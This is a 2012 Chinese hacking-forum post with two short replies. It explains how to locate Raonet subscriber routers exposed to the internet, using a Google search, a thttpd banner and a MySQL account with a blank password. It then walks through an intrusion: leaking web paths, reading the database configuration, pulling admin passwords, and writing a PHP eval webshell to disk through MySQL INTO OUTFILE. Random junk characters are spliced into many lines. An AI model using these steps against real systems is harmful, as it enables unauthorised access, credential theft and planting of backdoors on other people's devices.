找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2823|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:3 [# M; V8 ]' Q

. Y: Q- Y: Z5 M1:google搜索'Raonet Subscriber Ethernet Router'  S6 N5 q6 j# U% }9 t4 s- F

  h1 {" ]4 k* k" E% _2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001" U4 |7 z' h& q% p4 z6 t

  R8 P* _7 y; ]. o7 K) Y2 B8 }3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
. I& M' F6 U% Z4 B; g2 g4 T0 g$ c9 x1 U" D1 V9 J
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
6 g. U" @' v! }" a: e' u5 J5 g( H' ?* b& h8 W

$ o) `) G$ F- o* w; D( S
3 l4 P# e& F7 `1 ^  {$ x  e' k入侵步骤:
" i  {7 i& \) ~
# L7 Q! W2 }0 K3 G3 p. L$ a; S1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
! l5 ?- z/ o* X' l, m
8 p. ?5 M7 E# S; x: R2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
7 t$ u" f7 K7 c) K/ X" U3:得到密码后连接,查看GUI管理密码:
( f# u" J/ Y, b: T+ [/ L( d  Huse ser_500+ C# I5 e* P2 ^( x; J8 o
select id,passwd from user;: ^$ ~1 Y% |5 O8 q" |
4:通过数据库写入webshell,执行命令:
2 C+ ?0 E* f0 d0 o. X9 g8 ruse mysql;
3 G7 Q5 {9 L& D3 [" e; u, ?# ^create table ok(cmd TEXT);4 l" o9 z5 v" M. r# z4 J) g) S
insert into ok values("<?php @eval($_POST[cmd])?>");
* R9 ]4 |0 B6 r  n+ dselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
% \3 w, m) Q9 I3 Odrop table ok;
, N$ w7 j. m; D! v+ d5 p* ?  w- k. l% R0 p
5:连接后门shell.php ) @0 u2 \$ }) p: |& ?: U, ~$ T0 _
4 J5 N" D8 H" f# D% y
6. 搞定!
- F" U0 E) T9 E* j( B! M% C# W9 P5 m, G8 U  V: q+ t; b5 [
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表